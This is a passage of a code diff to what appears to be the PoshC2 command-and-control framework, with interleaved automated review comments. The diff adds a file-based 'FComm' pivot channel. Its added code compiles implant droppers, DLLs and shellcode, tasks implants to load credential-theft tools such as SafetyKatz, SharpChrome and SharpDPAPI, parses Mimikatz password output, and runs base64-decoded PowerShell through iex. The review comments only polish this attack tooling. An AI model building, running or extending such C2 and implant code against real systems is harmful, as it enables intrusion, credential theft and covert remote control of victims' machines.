sharpcookiemonster.program"):
- check_module_loaded("SharpCookieMonster.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SharpCookieMonster.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("sharpsocks"):
- check_module_loaded("SharpSocks.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SharpSocks.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("safetykatz"):
- check_module_loaded("SafetyKatz.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SafetyKatz.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("sharpwmi"):
- check_module_loaded("SharpWMI.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SharpWMI.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("sharpsc"):
- check_module_loaded("SharpSC.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SharpSC.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("sharpcookiemonster"):
- check_module_loaded("SharpCookieMonster.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SharpCookieMonster.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-exe program ps"):
- check_module_loaded("PS.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("PS.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("pslo"):
- check_module_loaded("PS.exe", randomuri, user, isPBind=isPBind, 
isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("PS.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-dll sharpsploit"):
- check_module_loaded("SharpSploit.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SharpSploit.dll", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-exe mainclass runascs"):
- check_module_loaded("RunasCs.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("RunasCs.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("invoke-daisychain"):
- check_module_loaded("Daisy.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("Daisy.dll", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-exe runas.program runas"):
- check_module_loaded("RunAs.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("RunAs.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("portscan"):
- check_module_loaded("PortScanner.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("PortScanner.dll", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-exe sweetpotato.program "):
- check_module_loaded("SweetPotato.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SweetPotato.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-exe sharpdpapi.program "):
- check_module_loaded("SharpDPAPI.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ 
check_module_loaded("SharpDPAPI.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-exe sharpchome.program "):
- check_module_loaded("SharpChrome.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SharpChrome.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-dll pbind"):
- check_module_loaded("PBind.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("PBind.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("pbind-connect"):
- check_module_loaded("PBind.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("PBind.exe", randomuri, user, loadmodule_command=loadmodule_command)
+ elif command.startswith("run-dll fcomm"):
+ check_module_loaded("FComm.exe", randomuri, user, loadmodule_command=loadmodule_command)
+ elif command.startswith("fcomm-connect"):
+ check_module_loaded("FComm.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-exe-background inveigh"):
- check_module_loaded("Inveigh.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("Inveigh.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-dll pwrstatustracker"):
- check_module_loaded("PwrStatusTracker.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("PwrStatusTracker.dll", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("getpowerstatus"):
- check_module_loaded("PwrStatusTracker.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("PwrStatusTracker.dll", randomuri, user, 
loadmodule_command=loadmodule_command)
 elif command.startswith("loadpowerstatus"):
- check_module_loaded("PwrStatusTracker.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("PwrStatusTracker.dll", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-exe lockless.program lockless "):
- check_module_loaded("LockLess.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("LockLess.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-exe sharpapplocker.program sharpapplocker"):
- check_module_loaded("SharpApplocker.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SharpApplocker.exe", randomuri, user, loadmodule_command=loadmodule_command)
 elif command.startswith("run-exe sharpedrchecker.program sharpedrchecker"):
- check_module_loaded("SharpEDRChecker.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri)
+ check_module_loaded("SharpEDRChecker.exe", randomuri, user, loadmodule_command=loadmodule_command)
diff --git a/poshc2/server/Config.py b/poshc2/server/Config.py
index 642c7f7e..3e5c1be2 100644
--- a/poshc2/server/Config.py
+++ b/poshc2/server/Config.py
@@ -112,6 +112,9 @@
 PBindPipeName = config["PBindPipeName"]
 PBindSecret = config["PBindSecret"]
+# FComm Options
+FCommFileName = config["FCommFileName"]
+
 # HTTP Response Options
 GET_404_Response = open('%sresponses/404_response.html' % ResourcesDirectory, 'r').read()
diff --git a/poshc2/server/Implant.py b/poshc2/server/Implant.py
index bdc65828..2dab6337 100644
--- a/poshc2/server/Implant.py
+++ b/poshc2/server/Implant.py
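Review bot: `FCommFileName = config["FCommFileName"]` makes the new key mandatory, so a project config written before this commit (the key only exists in the updated config-template.yml) raises KeyError when Config.py is imported, and Payloads.py's new `FCommFileName as DefaultFCommFileName` import fails with it. If an older config should keep working, `FCommFileName = config.get("FCommFileName")` keeps the module importable and lets the payload code decide what to do with a missing value; if the key is meant to be required, that is worth a line in the upgrade notes. I cannot see from this hunk whether the loader validates keys elsewhere, so this may already be handled.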
@@ -57,6 +57,8 @@ def display(self):
 it = self.Pivot
 if "pbind" in it.lower():
 urlInfo = "PBind"
+ if "fcomm" in it.lower():
+ urlInfo = "FComm"
 else:
 urlInfo = get_url_by_id(self.URLID[0])
 if urlInfo is not None:
@@ -134,6 +136,10 @@ def autoruns(self):
 update_label("Parent: %s" % self.IPAddress, self.RandomURI)
 #new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", self.IPAddress)
 update_mods("Stage2-Core.exe", self.RandomURI)
+ if "FC" in self.Pivot:
+ update_label("Parent: %s" % self.IPAddress, self.RandomURI)
+ new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)
+ update_mods("Stage2-Core.exe", self.RandomURI)
 result = get_autoruns()
 if result:
 for autorun in result:
diff --git a/poshc2/server/Tasks.py b/poshc2/server/Tasks.py
index 3f89c9dd..3c83ec70 100644
--- a/poshc2/server/Tasks.py
+++ b/poshc2/server/Tasks.py
@@ -96,7 +96,19 @@ def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
 DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
 else:
 DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
-
+
+ elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
+ outputParsed = re.search("FComm-Connected:.*", outputParsed)
+ outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
+ Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
+ Proxy = Proxy.replace("\x00", "")
+ if "\\" in User:
+ User = User[User.index("\\") + 1:]
+ newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
+ newImplant.save()
+ newImplant.display()
+ newImplant.autoruns()
+ DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
 elif executedCmd.lower().startswith("beacon "):
 new_sleep = executedCmd.replace('beacon ', '').strip()
 DB.update_sleep(new_sleep, RandomURI)
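Review bot: In display(), the new `if "fcomm" in it.lower():` is a separate statement, so the existing `else:` now belongs to it instead of to the pbind test: a PBind pivot sets urlInfo to "PBind" and is then immediately overwritten by `get_url_by_id(self.URLID[0])`. Changing the added line to `elif "fcomm" in it.lower():` restores three mutually exclusive branches. display() starts and ends outside this hunk.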
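Review bot: The new `new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)` in autoruns() queues the task under the child implant's own RandomURI, while the Tasks.py hunk in this commit issues the same `fcomm-loadmodule Stage2-Core.exe` task on the parent's RandomURI right after calling `newImplant.autoruns()`; the sibling pbind branch directly above has its equivalent line commented out, which suggests the per-child call was found not to be the right place. If the parent-side task is the one that reaches the implant, drop the new `new_task` line here (or the one in Tasks.py) so Stage2-Core.exe is loaded once rather than queued twice. `if "FC" in self.Pivot:` is also a loose substring test; comparing against the value Tasks.py actually stores (`"C# FComm"`, assuming that argument ends up in Pivot) would be more precise. autoruns() continues outside the hunk.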
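Review bot: `Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")` raises ValueError unless the banner splits into exactly six fields, and that only holds because the template's format string `"FComm-Connected: {0};{1};{2};{3};{4};"` (fcomm.cs in this commit) carries a trailing `;`, which also makes Proxy always the empty string for this pivot. `Domain, User, Hostname, Arch, PID, *rest = str(outputParsed).split(";")` accepts a banner with or without the trailing separator, and Proxy can then be derived from `rest` or simply fixed to `""` with a comment saying FComm reports no proxy. Whether a ValueError here is caught by an outer handler in newTaskOutput() is not visible from the hunk; the `re.search(...)[0]` index is safe because of the `"FComm-Connected" in outputParsed` guard.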
@@ -210,7 +222,7 @@ def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
 DB.update_task(taskId, message)
 print(message)
- elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
+ elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
 print("Parsing Mimikatz Output")
 DB.update_task(taskId, outputParsed)
 process_mimikatz(outputParsed)
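Review bot: The condition now matches any `pbind-` command but only `fcomm-command` for the new pivot, and the widening from `pbind-command` to `pbind-` is not mentioned in the commit; if output parsing is meant to apply however the pivot command was issued, `fcomm-` would mirror it, otherwise the old `pbind-command` was probably meant to stay. The `or` chain is also long enough that a tuple reads better and keeps the prefixes in one place: `executedCmd.lower().startswith(("run-exe safetykatz", "pbind-", "fcomm-command", "run-dll sharpsploit"))` combined with the existing `"invoke-mimikatz" in executedCmd` test. newTaskOutput() continues outside the hunk.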
@@ -243,12 +255,16 @@ def newTask(path):
 if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
 user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
 command = command[:command.index("#")]
- elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file')):
+ elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
 PBind = False
+ FComm = False
 if command.lower().startswith('pbind-command upload-file'):
 PBind = True
+ if command.lower().startswith('fcomm-command upload-file'):
+ FComm = True
 upload_args = command \
 .replace('pbind-command upload-file', '') \
+ .replace('fcomm-command upload-file', '') \
 .replace('upload-file', '')
 upload_file_args_split = upload_args.split()
 if len(upload_file_args_split) < 2:
@@ -279,6 +295,8 @@ def newTask(path):
 print(Colours.GREEN)
 if PBind:
 command = f"pbind-command {command}"
+ if FComm:
+ command = f"fcomm-command {command}"
 filehash = hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()
 user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
 taskId = DB.insert_task(RandomURI, user_command, user)
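Review bot: The parallel booleans `PBind`/`FComm` set in the first hunk and consumed in the second (`if PBind: ...` / `if FComm: ...`) duplicate the prefix knowledge in four places; capturing the matched prefix once keeps them from drifting: `prefix = next((p for p in ("pbind-command ", "fcomm-command ") if command.lower().startswith(p + "upload-file")), "")` in the first hunk and `command = f"{prefix}{command}"` in the second. With the prefix known, `upload_args = command[len(prefix):].replace('upload-file', '')` also replaces the chained `.replace(...)` calls, which strip the marker anywhere in the string rather than only at the start. newTask() starts and ends outside these hunks.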
@@ -291,7 +309,7 @@ def newTask(path):
 else:
 print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
 try:
- if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute")):
+ if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute")):
 print(user_command[0:200])
 print("----TRUNCATED----")
 else:
@@ -343,6 +361,15 @@ def newTask(path):
 print("Cannot base64 the command for PS")
 print(e)
 traceback.print_exc()
+ elif task[2].startswith("fcomm-command run-exe Program PS "):
+ try:
+ cmd = (task[2]).replace("fcomm-command run-exe Program PS ", "")
+ modulestr = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
+ command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % modulestr
+ except Exception as e:
+ print("Cannot base64 the command for PS")
+ print(e)
+ traceback.print_exc()
 elif task[2].startswith("pslo "):
 try:
 module_name = (task[2]).replace("pslo ", "")
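Review bot: The `fcomm-command run-exe Program PS ` branch in the second hunk is a copy of the pbind branch above it with only the prefix and the `run-exe FComm.FCClass FComm` target changed, and the same holds for the `fcomm-pslo`, `fcomm-loadmodule`, `fcomm-command`, `fcomm-connect` and `fcomm-kill` branches in the next two hunks of this file; a small table mapping each pivot prefix to its dispatch string, e.g. `PIVOTS = {"pbind-": "run-exe PBind PBind", "fcomm-": "run-exe FComm.FCClass FComm"}`, would let one branch per command serve both pivots and keep future fixes in one place. In the first hunk the truncation test gains a third near-identical clause; `user_command.lower().startswith(tuple(p + "run-exe sharpwmi.program sharpwmi action=execute" for p in ("", "pbind-command ", "fcomm-command ")))` keeps it to one line. The `except Exception` around `base64.b64encode(cmd.encode("utf-8"))` cannot realistically fire, and if it ever did the task would be sent unencoded because `command` is left untouched; a comment stating that fallback is intended, or a `continue`/skip, would make the behaviour explicit. newTask() starts and ends outside these hunks.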
@@ -381,6 +408,18 @@ def newTask(path):
 print("Cannot find module, loadmodule is case sensitive!")
 print(e)
 traceback.print_exc()
+ elif task[2].startswith("fcomm-pslo"):
+ try:
+ module_name = (task[2]).replace("fcomm-pslo ", "")
+ for modname in os.listdir(ModulesDirectory):
+ if modname.lower() in module_name.lower():
+ module_name = modname
+ modulestr = load_module_sharp(module_name)
+ command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % modulestr
+ except Exception as e:
+ print("Cannot find module, loadmodule is case sensitive!")
+ print(e)
+ traceback.print_exc()
 elif task[2].startswith("pbind-loadmodule "):
 try:
 module_name = (task[2]).replace("pbind-loadmodule ", "")
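Review bot: `startswith("fcomm-pslo")` has no trailing space while the `replace("fcomm-pslo ", "")` on the next line does, so a bare `fcomm-pslo` enters the branch with module_name still equal to the whole command, and the resulting failure is reported as "Cannot find module, loadmodule is case sensitive!" even though the scan directly above matches case-insensitively; `startswith("fcomm-pslo ")` matches the `pbind-loadmodule ` test below and makes the message accurate. The listdir scan also keeps going after a hit, so when two module names overlap the last directory entry wins; a `break` after `module_name = modname` makes the choice deterministic. newTask() starts and ends outside the hunk.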
@@ -419,6 +458,37 @@ def newTask(path):
 command = command.replace("pbind-connect ", "run-exe PBind PBind start ")
 elif task[2].startswith("pbind-kill"):
 command = command.replace("pbind-kill", "run-exe PBind PBind kill-implant")
+ elif task[2].startswith("fcomm-loadmodule "):
+ try:
+ module_name = (task[2]).replace("fcomm-loadmodule ", "")
+ if ".exe" in module_name:
+ for modname in os.listdir(ModulesDirectory):
+ if modname.lower() in module_name.lower():
+ module_name = modname
+ modulestr = load_module_sharp(module_name)
+ command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
+ elif ".dll" in module_name:
+ for modname in os.listdir(ModulesDirectory):
+ if modname.lower() in module_name.lower():
+ module_name = modname
+ modulestr = load_module_sharp(module_name)
+ command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
+ else:
+ for modname in os.listdir(ModulesDirectory):
+ if modname.lower() in module_name.lower():
+ module_name = modname
+ modulestr = load_module(module_name)
+ command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
+ except Exception as e:
+ print("Cannot find module, loadmodule is case sensitive!")
+ print(e)
+ traceback.print_exc()
+ elif task[2].startswith("fcomm-command "):
+ command = command.replace("fcomm-command ", "run-exe FComm.FCClass FComm ")
+ elif task[2].startswith("fcomm-connect"):
+ command = command.replace("fcomm-connect ", "run-exe FComm.FCClass FComm start ")
+ elif task[2].startswith("fcomm-kill"):
+ command = command.replace("fcomm-kill", "run-exe FComm.FCClass FComm kill-implant")
 elif task[2].startswith("pbind-pivot-command "):
 try:
diff --git a/poshc2/server/payloads/Payloads.py b/poshc2/server/payloads/Payloads.py
index 233dce87..d65e9ee2 100644
--- a/poshc2/server/payloads/Payloads.py
+++ b/poshc2/server/payloads/Payloads.py
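Review bot: The `.exe` and `.dll` branches of `fcomm-loadmodule` are identical (same listdir scan, same `load_module_sharp` call, same `"loadmodule%s"` command), so they collapse to one branch, `if ".exe" in module_name or ".dll" in module_name:`, leaving only the PowerShell `else`. Both tests are substring checks; `module_name.lower().endswith((".exe", ".dll"))` states the intent of extension-based dispatch and is not fooled by a name that merely contains `.dll`, provided no caller depends on the looser match. `fcomm-connect` is matched without a trailing space but replaced with one, so a bare `fcomm-connect` passes through untranslated, mirroring the `pbind-connect` line above it. newTask() starts and ends outside the hunk.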
@@ -3,7 +3,7 @@
 from enum import Enum
 from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, DefaultMigrationProcess, PayloadModulesDirectory
-from poshc2.server.Config import PBindSecret as DefaultPBindSecret, PBindPipeName as DefaultPBindPipeName, PayloadDomainCheck as DefaultPayloadDomainCheck , StageRetries, StageRetriesInitialWait, StageRetriesLimit
+from poshc2.server.Config import PBindSecret as DefaultPBindSecret, PBindPipeName as DefaultPBindPipeName, PayloadDomainCheck as DefaultPayloadDomainCheck , StageRetries, StageRetriesInitialWait, StageRetriesLimit, FCommFileName as DefaultFCommFileName
 from poshc2.Colours import Colours
 from poshc2.Utils import gen_key, randomuri, formStr, offsetFinder, get_first_url, get_first_dfheader
 from poshc2.server.database.DB import get_url_by_id, get_default_url_id, select_item
@@ -15,13 +15,14 @@ class PayloadType(Enum):
 PBind = "PBind_v4"
 Sharp = "Sharp_v4"
 PBindSharp = "PBindSharp_v4"
+ FCommSharp = "FCommSharp_v4"
 class Payloads(object):
 quickstart = None
- def __init__(self, KillDate, Key, Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory, URLID=None, ImplantType="", PowerShellProxyCommand="", PBindPipeName=DefaultPBindPipeName, PBindSecret=DefaultPBindSecret, PayloadDomainCheck=DefaultPayloadDomainCheck):
+ def __init__(self, KillDate, Key, Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory, URLID=None, ImplantType="", PowerShellProxyCommand="", PBindPipeName=DefaultPBindPipeName, PBindSecret=DefaultPBindSecret, PayloadDomainCheck=DefaultPayloadDomainCheck, FCommFileName=DefaultFCommFileName):
 if not URLID:
 URLID = get_default_url_id()
@@ -47,6 +48,7 @@ def __init__(self, KillDate, Key, Insecure, UserAgent, Referrer, ConnectURL, Bas
 self.PBindPipeName = PBindPipeName
 self.PBindSecret = PBindSecret
 self.PayloadDomainCheck = PayloadDomainCheck
+ self.FCommFileName = FCommFileName if FCommFileName else DefaultFCommFileName
 self.BaseDirectory = BaseDirectory
 self.StageRetries = StageRetries
 self.StageRetriesLimit = StageRetriesLimit
@@ -153,6 +155,7 @@ def CreateDroppers(self, name=""):
 self.QuickstartLog(f"C# Dropper EXE written to: {self.BaseDirectory}{name}dropper_cs.exe")
 self.QuickstartLog(f"C# PBind Powershell v4 EXE written to: {self.BaseDirectory}{name}dropper_cs_ps_pbind_v4.exe")
 self.QuickstartLog(f"C# PBind Dropper EXE written to: {self.BaseDirectory}{name}pbind_cs.exe")
+ self.QuickstartLog(f"C# FComm Dropper EXE written to: {self.BaseDirectory}{name}fcomm_cs.exe")
 # Powershell (system.management.automation.dll) Dropper
 with open("%sSharp_Powershell_Runner.cs" % PayloadTemplatesDirectory, 'r') as f:
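Review bot: `self.FCommFileName = FCommFileName if FCommFileName else DefaultFCommFileName` differs from the neighbouring `self.PBindPipeName = PBindPipeName` and `self.PBindSecret = PBindSecret`, which store the argument as given; since the parameter already defaults to DefaultFCommFileName, the guard only matters when a caller passes an explicit empty or None value, and then it silently substitutes the config value instead of surfacing the bad argument. Either give the PBind fields the same fallback or use the plain `self.FCommFileName = FCommFileName` so the three behave alike; if the silent fallback is deliberate, a one-line comment saying why an empty value is acceptable would save the next reader the question. __init__ starts and ends outside the hunk.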
@@ -227,6 +230,23 @@ def CreateDroppers(self, name=""):
 os.rename("%sPB.exe" % (self.BaseDirectory), "%s%spbind_cs.exe" % (self.BaseDirectory, name))
+ # FComm CSharp Dropper
+ with open("%sfcomm.cs" % PayloadTemplatesDirectory, 'r') as f:
+ content = f.read()
+
+ content = str(content) \
+ .replace("#REPLACEKEY#", self.Key) \
+ .replace("#REPLACEFCOMMFILENAME#", self.FCommFileName)
+
+ with open("%s%sfcomm.cs" % (self.BaseDirectory, name), 'w') as f:
+ f.write(str(content))
+
+ subprocess.check_output("mono-csc %s%sfcomm.cs -out:%sFC.exe -target:exe -warn:1 -sdk:4" % (self.BaseDirectory, name, self.BaseDirectory), shell=True)
+
+ subprocess.check_output("mono-csc %s%sfcomm.cs -out:%sFC.exe -target:exe -warn:1 -sdk:4" % (self.BaseDirectory, name, self.BaseDirectory), shell=True)
+
+ os.rename("%sFC.exe" % (self.BaseDirectory), "%s%sfcomm_cs.exe" % (self.BaseDirectory, name))
+
 def PatchBytes(self, filename, dll, offset, payloadtype, name=""):
 filename = "%s%s" % (self.BaseDirectory, filename)
 with open(filename, 'wb') as f:
@@ -248,6 +268,9 @@ def PatchBytes(self, filename, dll, offset, payloadtype, name=""):
 elif payloadtype == PayloadType.PBindSharp:
 srcfilename = "%s%s%s" % (self.BaseDirectory, name, "pbind_cs.exe")
+ elif payloadtype == PayloadType.FCommSharp:
+ srcfilename = "%s%s%s" % (self.BaseDirectory, name, "fcomm_cs.exe")
+
 with open(srcfilename, "rb") as f:
 dllbase64 = f.read()
 dllbase64 = base64.b64encode(dllbase64).decode("utf-8")
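Review bot: The template substitution drops `self.FCommFileName` verbatim into the C# verbatim string `@"#REPLACEFCOMMFILENAME#"` (fcomm.cs in this commit), so a configured path containing a double quote produces a source file that mono-csc rejects; escaping with `.replace('"', '""')` before substitution, or rejecting such a value where the config is read, closes that gap. `subprocess.check_output("mono-csc %s%sfcomm.cs ..." % (...), shell=True)` is also run twice with identical arguments, which looks like a copy-paste of the block above rather than a deliberate rebuild unless that block compiles twice for a reason not visible here. Because `name` and `self.BaseDirectory` are interpolated into a shell string, a directory containing spaces or shell metacharacters either breaks the build or is interpreted by the shell; an argv list without `shell=True`, `subprocess.check_output(["mono-csc", f"{self.BaseDirectory}{name}fcomm.cs", f"-out:{self.BaseDirectory}FC.exe", "-target:exe", "-warn:1", "-sdk:4"])`, avoids both. CreateDroppers() starts outside the hunk.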
@@ -289,6 +312,8 @@ def CreateDlls(self, name=""):
 self.CreateDll(f"{name}PBind_v4_x64.dll", f"{PayloadTemplatesDirectory}Sharp_v4_x64_dll.b64", PayloadType.PBind, name)
 self.CreateDll(f"{name}PBindSharp_v4_x86.dll", f"{PayloadTemplatesDirectory}Sharp_v4_x86_dll.b64", PayloadType.PBindSharp, name)
 self.CreateDll(f"{name}PBindSharp_v4_x64.dll", f"{PayloadTemplatesDirectory}Sharp_v4_x64_dll.b64", PayloadType.PBindSharp, name)
+ self.CreateDll(f"{name}FCommSharp_v4_x86.dll", f"{PayloadTemplatesDirectory}Sharp_v4_x86_dll.b64", PayloadType.FCommSharp, name)
+ self.CreateDll(f"{name}FCommSharp_v4_x64.dll", f"{PayloadTemplatesDirectory}Sharp_v4_x64_dll.b64", PayloadType.FCommSharp, name)
 def CreateShellcode(self, name=""):
 self.QuickstartLog(Colours.END)
@@ -303,6 +328,8 @@ def CreateShellcode(self, name=""):
 self.CreateShellcodeFile(f"{name}PBind_v4_x64_Shellcode.bin", f"{name}PBind_v4_x64_Shellcode.b64", f"{PayloadTemplatesDirectory}Sharp_v4_x64_Shellcode.b64", PayloadType.PBind, name)
 self.CreateShellcodeFile(f"{name}PBindSharp_v4_x86_Shellcode.bin", f"{name}PBindSharp_v4_x86_Shellcode.b64", f"{PayloadTemplatesDirectory}Sharp_v4_x86_Shellcode.b64", PayloadType.PBindSharp, name)
 self.CreateShellcodeFile(f"{name}PBindSharp_v4_x64_Shellcode.bin", f"{name}PBindSharp_v4_x64_Shellcode.b64", f"{PayloadTemplatesDirectory}Sharp_v4_x64_Shellcode.b64", PayloadType.PBindSharp, name)
+ self.CreateShellcodeFile(f"{name}FCommSharp_v4_x86_Shellcode.bin", f"{name}FCommSharp_v4_x86_Shellcode.b64", f"{PayloadTemplatesDirectory}Sharp_v4_x86_Shellcode.b64", PayloadType.FCommSharp, name)
+ self.CreateShellcodeFile(f"{name}FCommSharp_v4_x64_Shellcode.bin", f"{name}FCommSharp_v4_x64_Shellcode.b64", f"{PayloadTemplatesDirectory}Sharp_v4_x64_Shellcode.b64", PayloadType.FCommSharp, name)
 def CreateSCT(self, name=""):
 self.QuickstartLog(Colours.END)
@@ -465,6 +492,17 @@ def CreateEXEFiles(self, sourcefile, payloadtype, name=""):
 hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
 shellcode64 = formStr("char sc[]", hexcode)
+ elif payloadtype == PayloadType.FCommSharp:
+ # Get the Sharp shellcode
+ with open("%s%sFCommSharp_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
+ shellcodesrc = f.read()
+ hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
+ shellcode32 = formStr("char sc[]", hexcode)
+ with open("%s%sFCommSharp_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
+ shellcodesrc = f.read()
+ hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
+ shellcode64 = formStr("char sc[]", hexcode)
+
 # Create the raw C file from the template
 with open("%s%s" % (PayloadTemplatesDirectory, sourcefile), 'r') as f:
 content = f.read()
@@ -543,6 +581,11 @@ def CreateMsbuildFiles(self, payloadtype, name=""):
 x86base64 = f.read()
 with open("%s%s" % (self.BaseDirectory, name + "PBindSharp_v4_x64_Shellcode.bin"), "rb") as f:
 x64base64 = f.read()
